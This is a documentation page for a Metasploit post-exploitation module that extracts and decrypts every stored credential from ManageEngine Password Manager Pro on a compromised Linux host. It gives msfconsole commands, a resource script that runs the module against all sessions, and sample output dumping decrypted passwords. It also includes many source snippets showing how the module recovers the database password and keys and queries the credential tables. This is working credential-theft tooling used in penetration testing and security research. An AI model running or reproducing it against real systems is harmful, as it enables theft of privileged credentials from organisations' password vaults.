Linux Gather ManageEngine Password Manager Pro Password Extractor - Metasploit


This page contains detailed information about how to use the post/linux/gather/manageengine_password_manager_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Linux Gather ManageEngine Password Manager Pro Password Extractor
Module: post/linux/gather/manageengine_password_manager_creds
Source code: modules/post/linux/gather/manageengine_password_manager_creds.rb
Disclosure date: -
Last modification time: 2022-11-02 14:03:15 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module gathers the encrypted passwords stored by Password Manager Pro and decrypt them using key materials stored in multiple configuration files.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/linux/gather/manageengine_password_manager_creds

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/linux/gather/manageengine_password_manager_creds
msf post(manageengine_password_manager_creds) > show options
    ... show and set options ...
msf post(manageengine_password_manager_creds) > set SESSION session-id
msf post(manageengine_password_manager_creds) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/linux/gather/manageengine_password_manager_creds")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on

Knowledge Base

Vulnerable Application

This post module gathers ManageEngine's Password Manager Pro credentials from the local database. This information is encrypted but all the key materials can be extracted from the application configuration files and the database itself.

This module simply starts to retrieve the database password, the database encryption key and the data encryption key, which is used to decrypt passwords also stored in the database. The result is displayed and stored in the Metasploit database.

For now, only Linux hosts are supported. This module has been tested with Password Manager Pro versions 10.5.0 (build 10501) and 12.1.0 (build 12123), both installed on Ubuntu 20.04.4 (x64).

Installation

Download ManageEngine_PMP_64bit.bin from one of the versions at https://archives2.manageengine.com/passwordmanagerpro/ and run the installer as root.

For example: $ curl -O https://archives2.manageengine.com/passwordmanagerpro/12123/ManageEngine_PMP_64bit.bin $ chmod a+x ManageEngine_PMP_64bit.bin $ ./ManageEngine_PMP_64bit.bin Follow the step-by-step instructions as they appear on the screen. Enter any location for the installation base path and select "High availability primary server".

First, launch Password Manager Pro (PMP) in standalone mode. Depending on the version, it is sometimes required to accept the License Agreement and select the license type. If it is the case, select the Free license (f). $ cd <installation base path>/bin/ $ ./wrapper ../conf/wrapper_lin.conf

Once the first time boot process is finished, access the following URL to make sure it works: https://127.0.0.1:7272

You can test the module with PMP in standalone mode or continue for a service installation: Stop PMP (Ctrl-C) and run: $ bash ./pmp.sh install $ /etc/init.d/pmp-service start PMP will run in the background and logs are located in the <installation base path>/logs folder.

You can refer to the vendor documentation.

Setup

To properly test this module, some resources and accounts will need to be added to the database: 1. Access https://127.0.0.1:7272 and login as the main administrator with the default credentials (admin:admin): 1. Go to the Resources section on the left hand panel. 1. In the main panel, select Add Resource and Add Manually 1. Fill in the required fields (select any type of resource) and click Save & Proceed 1. Start adding accounts to this resource by filling the necessary fields and click Add 1. Once you have some accounts added, click Save 1. Repeat the process to add other resources/accounts

Verification Steps

  1. Install the application (see #Installation)
  2. Start msfconsole
  3. Get a session
  4. Do: use post/linux/gather/manageengine_password_manager_creds
  5. Do: run verbose=true session=1
  6. Verify the installation is correctly detected
  7. Verify all the key material is retrieved
  8. Verify all the accounts are enumerated with their decrypted password
  9. Do: creds
  10. Verify the credentials are correctly stored in the database

To test the installation path detection logic, you can repeat the process with PMP launched both in standalone mode and as a service.

Also, this is interesting to test with both a shell and Meterpreter sessions.

Note that an issue in Meterpreter makes the service detection logic fail to detect the installation path. The other process detection works normally, so it doesn't block the module execution.

Options

INSTALL_PATH

The Password Manager Pro installation path. If not provided, the module will try its best to detect it.

PG_HOST

The PostgreSQL host. Password Manager Pro run PostgreSQL locally by default, so the default value is 127.0.0.1.

PG_PORT

The PostgreSQL port. Default is 2345.

Scenarios

Meterpreter session on Ubuntu 20.04.4 - PMP version 12.1.0 (build 12123)

msf6 post(linux/gather/manageengine_password_manager_creds) > run verbose=true session=1

[*] Detecting installation path
[*] Trying to detect path from the Password Manager service
[-] `/etc/init.d/pmp-service` is not a symlink and the installation path cannot be detected
[*] Trying to detect path from the Password Manager related processes
[*] Installation path: /opt/ManageEngine/PMP
[*] Getting the database password
[+] Database password: BKPVR8EFqy
[*] Getting the database encryption key
[+] Found the database key configuration: /opt/ManageEngine/PMP/conf/pmp_key.key
[+] Database encryption key: crOKEnAvDftdOiW4u7fnhAD5iDBVksKYfc24mR3BZjE\=
[+] `notesdescription` field value: T-e)>(72LJCC7007
Password Manager Pro Credentials
================================

 Resource Name  Resource URL              Account Notes    Login Name     Password
 -------------  ------------              -----------      ----------     --------
 Resource 1     https://foomsf.com        Admin creds      Administrator  P@ssw0rd!
 Resource 1     https://foomsf.com        Op creds         Operator       MySuperStrongPassword
 Resource 1     https://foomsf.com        Test account     TestUser       12345678
 Resource2      https://mysql.foomsf.com  SQL admin        master         MyP@sswd123$
 Resource2      https://mysql.foomsf.com  web db password  webdb          123webpassW0Rd@

[*] Post module execution completed
msf6 post(linux/gather/manageengine_password_manager_creds) > creds
Credentials
===========

host  origin           service  public         private                realm  private_type  JtR Format
----  ------           -------  ------         -------                -----  ------------  ----------
      192.168.177.152           Administrator  P@ssw0rd!                     Password
      192.168.177.152           Operator       MySuperStrongPassword         Password
      192.168.177.152           TestUser       12345678                      Password
      192.168.177.152           master         MyP@sswd123$                  Password
      192.168.177.152           webdb          123webpassW0Rd@               Password

Shell session on Ubuntu 20.04.4 - PMP version 12.1.0 (build 12123)

msf6 post(linux/gather/manageengine_password_manager_creds) > run verbose=true session=2

[*] Detecting installation path
[*] Trying to detect path from the Password Manager service
[*] Installation path: /opt/ManageEngine/PMP
[*] Getting the database password
[+] Database password: BKPVR8EFqy
[*] Getting the database encryption key
[+] Found the database key configuration: /opt/ManageEngine/PMP/conf/pmp_key.key
[+] Database encryption key: crOKEnAvDftdOiW4u7fnhAD5iDBVksKYfc24mR3BZjE\=
[+] `notesdescription` field value: T-e)>(72LJCC7007
Password Manager Pro Credentials
================================

 Resource Name  Resource URL              Account Notes    Login Name     Password
 -------------  ------------              -----------      ----------     --------
 Resource 1     https://foomsf.com        Admin creds      Administrator  P@ssw0rd!
 Resource 1     https://foomsf.com        Op creds         Operator       MySuperStrongPassword
 Resource 1     https://foomsf.com        Test account     TestUser       12345678
 Resource2      https://mysql.foomsf.com  SQL admin        master         MyP@sswd123$
 Resource2      https://mysql.foomsf.com  web db password  webdb          123webpassW0Rd@

[*] Post module execution completed
msf6 post(linux/gather/manageengine_password_manager_creds) > creds
Credentials
===========

host  origin           service  public         private                realm  private_type  JtR Format
----  ------           -------  ------         -------                -----  ------------  ----------
      192.168.177.152           Administrator  P@ssw0rd!                     Password
      192.168.177.152           Operator       MySuperStrongPassword         Password
      192.168.177.152           TestUser       12345678                      Password
      192.168.177.152           master         MyP@sswd123$                  Password
      192.168.177.152           webdb          123webpassW0Rd@               Password

Go back to menu.

Msfconsole Usage

Here is how the linux/gather/manageengine_password_manager_creds post exploitation module looks in the msfconsole:

msf6 > use post/linux/gather/manageengine_password_manager_creds

msf6 post(linux/gather/manageengine_password_manager_creds) > show info

       Name: Linux Gather ManageEngine Password Manager Pro Password Extractor
     Module: post/linux/gather/manageengine_password_manager_creds
   Platform: Unix, Linux
       Arch: 
       Rank: Normal

Provided by:
  Travis Kaun
  Rob Simon
  Charles Yost
  Christophe De La Fuente

Module stability:
 crash-safe

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  INSTALL_PATH                   no        The Password Manager Pro installation path. The module will try to auto detect it if not set.
  PG_HOST       127.0.0.1        no        The PostgreSQL host
  PG_PORT       2345             no        The PostgreSQL port
  SESSION                        yes       The session to run this module on

Description:
  This module gathers the encrypted passwords stored by Password 
  Manager Pro and decrypt them using key materials stored in multiple 
  configuration files.

References:
  https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/
  https://github.com/trustedsec/Zoinks/blob/main/zoinks.py

Module Options

This is a complete list of options available in the linux/gather/manageengine_password_manager_creds post exploitation module:

msf6 post(linux/gather/manageengine_password_manager_creds) > show options

Module options (post/linux/gather/manageengine_password_manager_creds):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        The Password Manager Pro installation path. The module will try to auto detect it if not set.
   PG_HOST       127.0.0.1        no        The PostgreSQL host
   PG_PORT       2345             no        The PostgreSQL port
   SESSION                        yes       The session to run this module on

Advanced Options

Here is a complete list of advanced options supported by the linux/gather/manageengine_password_manager_creds post exploitation module:

msf6 post(linux/gather/manageengine_password_manager_creds) > show advanced

Module advanced options (post/linux/gather/manageengine_password_manager_creds):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the linux/gather/manageengine_password_manager_creds module can do:

msf6 post(linux/gather/manageengine_password_manager_creds) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the linux/gather/manageengine_password_manager_creds post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(linux/gather/manageengine_password_manager_creds) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Cannot detect the installation path from the PMP processes

Here is a relevant code snippet related to the "Cannot detect the installation path from the PMP processes" error message:

70:	      found_path = shell_get_processes&.find do |process|
71:	        process['name'] =~ /pmp.*#{path}/i
72:	      end
73:	      return found_path['name'].split(path).first if found_path
74:	    end
75:	    vprint_error('Cannot detect the installation path from the PMP processes')
76:	
77:	    nil
78:	  end
79:	
80:	  def detect_service

Error when reading `<PMP_SERVICE_PATH>`: <E>

Here is a relevant code snippet related to the "Error when reading `<PMP_SERVICE_PATH>`: <E>" error message:

85:	    pmp_service_path = "#{SERVICE_DIR}/#{PMP_SERVICE}"
86:	
87:	    begin
88:	      pmp_file = stat(pmp_service_path)
89:	    rescue StandardError => e
90:	      vprint_error("Error when reading `#{pmp_service_path}`: #{e}")
91:	      return
92:	    end
93:	    unless pmp_file
94:	      vprint_error("PMP service script `#{pmp_service_path}` not found")
95:	      return

PMP service script `<PMP_SERVICE_PATH>` not found

Here is a relevant code snippet related to the "PMP service script `<PMP_SERVICE_PATH>` not found" error message:

89:	    rescue StandardError => e
90:	      vprint_error("Error when reading `#{pmp_service_path}`: #{e}")
91:	      return
92:	    end
93:	    unless pmp_file
94:	      vprint_error("PMP service script `#{pmp_service_path}` not found")
95:	      return
96:	    end
97:	
98:	    unless pmp_file.symlink?
99:	      vprint_error("`#{pmp_service_path}` is not a symlink and the installation path cannot be detected")

Here is a relevant code snippet related to the "`<PMP_SERVICE_PATH>` is not a symlink and the installation path cannot be detected" error message:

94:	      vprint_error("PMP service script `#{pmp_service_path}` not found")
95:	      return
96:	    end
97:	
98:	    unless pmp_file.symlink?
99:	      vprint_error("`#{pmp_service_path}` is not a symlink and the installation path cannot be detected")
100:	      return
101:	    end
102:	
103:	    begin
104:	      cmd = "readlink -f '#{pmp_service_path}'"

Error when executing `<CMD>`: <E>

Here is a relevant code snippet related to the "Error when executing `<CMD>`: <E>" error message:

102:	
103:	    begin
104:	      cmd = "readlink -f '#{pmp_service_path}'"
105:	      pmp_service_real = cmd_exec(cmd)
106:	    rescue StandardError => e
107:	      vprint_error("Error when executing `#{cmd}`: #{e}")
108:	      return
109:	    end
110:	    unless pmp_service_real
111:	      vprint_error("Cannot resolve the symlink #{pmp_service_path}")
112:	    end

Here is a relevant code snippet related to the "Cannot resolve the symlink <PMP_SERVICE_PATH>" error message:

106:	    rescue StandardError => e
107:	      vprint_error("Error when executing `#{cmd}`: #{e}")
108:	      return
109:	    end
110:	    unless pmp_service_real
111:	      vprint_error("Cannot resolve the symlink #{pmp_service_path}")
112:	    end
113:	
114:	    install_dir = pmp_service_real.split('/')
115:	    if install_dir.pop(2) == ['bin', PMP_SERVICE]
116:	      return install_dir.join('/')

Here is a relevant code snippet related to the "Cannot detect the installation path from the resolved symlink `<PMP_SERVICE_REAL>`" error message:

114:	    install_dir = pmp_service_real.split('/')
115:	    if install_dir.pop(2) == ['bin', PMP_SERVICE]
116:	      return install_dir.join('/')
117:	    end
118:	
119:	    vprint_error("Cannot detect the installation path from the resolved symlink `#{pmp_service_real}`")
120:	
121:	    nil
122:	  end
123:	
124:	  def detect_install_path

Error reading `<DB_PATH>`: <E>

Here is a relevant code snippet related to the "Error reading `<DB_PATH>`: <E>" error message:

147:	    db_path = "#{install_path}/#{DB_CONF_PATH}"
148:	
149:	    begin
150:	      db_conf = read_file(db_path)
151:	    rescue StandardError => e
152:	      print_error("Error reading `#{db_path}`: #{e}")
153:	      return
154:	    end
155:	    unless db_conf
156:	      print_error("Database configuration file `#{db_path}` not found")
157:	      return

Database configuration file `<DB_PATH>` not found

Here is a relevant code snippet related to the "Database configuration file `<DB_PATH>` not found" error message:

151:	    rescue StandardError => e
152:	      print_error("Error reading `#{db_path}`: #{e}")
153:	      return
154:	    end
155:	    unless db_conf
156:	      print_error("Database configuration file `#{db_path}` not found")
157:	      return
158:	    end
159:	
160:	    b64_password = db_conf.match(/password=(.+)$/)&.captures&.first
161:	    unless b64_password

Unable to retrieve the database password

Here is a relevant code snippet related to the "Unable to retrieve the database password" error message:

157:	      return
158:	    end
159:	
160:	    b64_password = db_conf.match(/password=(.+)$/)&.captures&.first
161:	    unless b64_password
162:	      print_error('Unable to retrieve the database password')
163:	      return
164:	    end
165:	
166:	    decrypt_text(b64_password, enc_key)
167:	  end

Error reading `<MANAGE_KEY_CONF_PATH>`: <E>

Here is a relevant code snippet related to the "Error reading `<MANAGE_KEY_CONF_PATH>`: <E>" error message:

171:	
172:	    manage_key_conf_path = "#{install_path}/#{MANAGE_KEY_CONF_PATH}"
173:	    begin
174:	      pmp_key_path = read_file(manage_key_conf_path)
175:	    rescue StandardError => e
176:	      print_error("Error reading `#{manage_key_conf_path}`: #{e}")
177:	      return
178:	    end
179:	    unless pmp_key_path
180:	      print_error("Database manage_key configuration file `#{manage_key_conf_path}` not found")
181:	      return

Database manage_key configuration file `<MANAGE_KEY_CONF_PATH>` not found

Here is a relevant code snippet related to the "Database manage_key configuration file `<MANAGE_KEY_CONF_PATH>` not found" error message:

175:	    rescue StandardError => e
176:	      print_error("Error reading `#{manage_key_conf_path}`: #{e}")
177:	      return
178:	    end
179:	    unless pmp_key_path
180:	      print_error("Database manage_key configuration file `#{manage_key_conf_path}` not found")
181:	      return
182:	    end
183:	    unless exist?(pmp_key_path)
184:	      print_error("Database key configuration file `#{pmp_key_path}` not found")
185:	      return

Database key configuration file `<PMP_KEY_PATH>` not found

Here is a relevant code snippet related to the "Database key configuration file `<PMP_KEY_PATH>` not found" error message:

179:	    unless pmp_key_path
180:	      print_error("Database manage_key configuration file `#{manage_key_conf_path}` not found")
181:	      return
182:	    end
183:	    unless exist?(pmp_key_path)
184:	      print_error("Database key configuration file `#{pmp_key_path}` not found")
185:	      return
186:	    end
187:	    vprint_good("Found the database key configuration: #{pmp_key_path}")
188:	
189:	    begin

Error reading `<PMP_KEY_PATH>`: <E>

Here is a relevant code snippet related to the "Error reading `<PMP_KEY_PATH>`: <E>" error message:

187:	    vprint_good("Found the database key configuration: #{pmp_key_path}")
188:	
189:	    begin
190:	      pmp_key = read_file(pmp_key_path)
191:	    rescue StandardError => e
192:	      print_error("Error reading `#{pmp_key_path}`: #{e}")
193:	      return
194:	    end
195:	    unless pmp_key
196:	      print_error("Database key configuration file #{pmp_key_path} not found")
197:	      return

Database key configuration file <PMP_KEY_PATH> not found

Here is a relevant code snippet related to the "Database key configuration file <PMP_KEY_PATH> not found" error message:

191:	    rescue StandardError => e
192:	      print_error("Error reading `#{pmp_key_path}`: #{e}")
193:	      return
194:	    end
195:	    unless pmp_key
196:	      print_error("Database key configuration file #{pmp_key_path} not found")
197:	      return
198:	    end
199:	
200:	    pmp_key.match(/ENCRYPTIONKEY=(.+)$/)&.captures&.first
201:	  end

Cannot find `pgsql` in the installation path `<PSQL>`

Here is a relevant code snippet related to the "Cannot find `pgsql` in the installation path `<PSQL>`" error message:

210:	
211:	  def psql_path(install_path)
212:	    return @psql_path if @psql_path
213:	
214:	    psql = "#{install_path}/pgsql/bin/psql"
215:	    raise Rex::RuntimeError, "Cannot find `pgsql` in the installation path `#{psql}`" unless exist?(psql)
216:	
217:	    @psql_path = psql
218:	  end
219:	
220:	  def query_db(query, install_path, db_password)

psql returned an error: <RESULT>

Here is a relevant code snippet related to the "psql returned an error: <RESULT>" error message:

221:	    cmd = "env PGPASSWORD=#{db_password} #{psql_path(install_path)} -w -A -t -h #{pg_host} -p #{pg_port} -U pmpuser -d PassTrix -c "
222:	    cmd << "\"#{query}\""
223:	    dlog("psql command: #{cmd}")
224:	
225:	    result, success = cmd_exec_with_result(cmd)
226:	    raise Rex::RuntimeError, "psql returned an error: #{result}" unless success
227:	
228:	    result
229:	  end
230:	
231:	  def process_key(key)

Error while querying `Ptrx_NotesInfo` table with `psql`: <E>

Here is a relevant code snippet related to the "Error while querying `Ptrx_NotesInfo` table with `psql`: <E>" error message:

239:	  def get_notesdescription(install_path, db_password, db_enc_key)
240:	    begin
241:	      cmd = 'SELECT notesdescription FROM Ptrx_NotesInfo'
242:	      b64_notesdescription = query_db(cmd, install_path, db_password)
243:	    rescue StandardError => e
244:	      print_error("Error while querying `Ptrx_NotesInfo` table with `psql`: #{e}")
245:	      return
246:	    end
247:	
248:	    enc_key = process_key(db_enc_key)
249:	    decrypt_text(b64_notesdescription, enc_key)

Error while dumping credentials with `psql`: <E>

Here is a relevant code snippet related to the "Error while dumping credentials with `psql`: <E>" error message:

260:	             LEFT JOIN ptrx_password ON ptrx_passbasedauthen.PASSWDID = ptrx_password.PASSWDID
261:	             LEFT JOIN ptrx_account ON ptrx_passbasedauthen.PASSWDID = ptrx_account.PASSWDID
262:	             LEFT JOIN ptrx_resource ON ptrx_account.RESOURCEID = ptrx_resource.RESOURCEID"
263:	      passwords = query_db(cmd, install_path, db_password)
264:	    rescue StandardError => e
265:	      print_error("Error while dumping credentials with `psql`: #{e}")
266:	      return
267:	    end
268:	
269:	    enc_key = process_key(db_enc_key)
270:	    passwords.each_line.map do |password|

Error reporting credentials `<USERNAME>:<PASSWORD>`: <E>

Here is a relevant code snippet related to the "Error reporting credentials `<USERNAME>:<PASSWORD>`: <E>" error message:

284:	      username: username,
285:	      workspace_id: myworkspace_id
286:	    }
287:	    create_credential(credential_data)
288:	  rescue StandardError => e
289:	    vprint_error("Error reporting credentials `#{username}:#{password}`: #{e}")
290:	    elog(e)
291:	  end
292:	
293:	  def display_and_report(resource_credentials)
294:	    cred_tbl = Rex::Text::Table.new({

Unable to detect the PMP installation path. Use the INSTALL_PATH option instead.

Here is a relevant code snippet related to the "Unable to detect the PMP installation path. Use the INSTALL_PATH option instead." error message:

314:	
315:	  def run
316:	    install_path = datastore['INSTALL_PATH'].blank? ? detect_install_path : datastore['INSTALL_PATH']
317:	    unless install_path
318:	      fail_with(Failure::BadConfig,
319:	                'Unable to detect the PMP installation path. Use the INSTALL_PATH option instead.')
320:	    end
321:	    print_status("Installation path: #{install_path}")
322:	
323:	    encryption_key = Digest::MD5.new.update(HARDCODED_KEY).hexdigest
324:

Unable to get the database password

Here is a relevant code snippet related to the "Unable to get the database password" error message:

322:	
323:	    encryption_key = Digest::MD5.new.update(HARDCODED_KEY).hexdigest
324:	
325:	    db_password = get_db_password(install_path, encryption_key)
326:	    unless db_password
327:	      fail_with(Failure::Unknown, 'Unable to get the database password')
328:	    end
329:	    print_good("Database password: #{db_password}")
330:	
331:	    db_enc_key = get_db_enc_key(install_path)
332:	    unless db_enc_key

Unable to get the database encryption key

Here is a relevant code snippet related to the "Unable to get the database encryption key" error message:

328:	    end
329:	    print_good("Database password: #{db_password}")
330:	
331:	    db_enc_key = get_db_enc_key(install_path)
332:	    unless db_enc_key
333:	      fail_with(Failure::Unknown, 'Unable to get the database encryption key')
334:	    end
335:	    print_good("Database encryption key: #{db_enc_key}")
336:	
337:	    notesdescription = get_notesdescription(install_path, db_password, db_enc_key)
338:	    unless notesdescription

Unable to get `notesdescription` from the database

Here is a relevant code snippet related to the "Unable to get `notesdescription` from the database" error message:

334:	    end
335:	    print_good("Database encryption key: #{db_enc_key}")
336:	
337:	    notesdescription = get_notesdescription(install_path, db_password, db_enc_key)
338:	    unless notesdescription
339:	      fail_with(Failure::Unknown, 'Unable to get `notesdescription` from the database')
340:	    end
341:	    print_good("`notesdescription` field value: #{notesdescription}")
342:	
343:	    resource_credentials = dump_credentials(install_path, db_password, db_enc_key, notesdescription)
344:	    unless resource_credentials

No credentials found in the database

Here is a relevant code snippet related to the "No credentials found in the database" error message:

340:	    end
341:	    print_good("`notesdescription` field value: #{notesdescription}")
342:	
343:	    resource_credentials = dump_credentials(install_path, db_password, db_enc_key, notesdescription)
344:	    unless resource_credentials
345:	      fail_with(Failure::Unknown, 'No credentials found in the database')
346:	    end
347:	
348:	    display_and_report(resource_credentials)
349:	  end
350:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Travis Kaun
  • Rob Simon
  • Charles Yost
  • Christophe De La Fuente

Version

This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.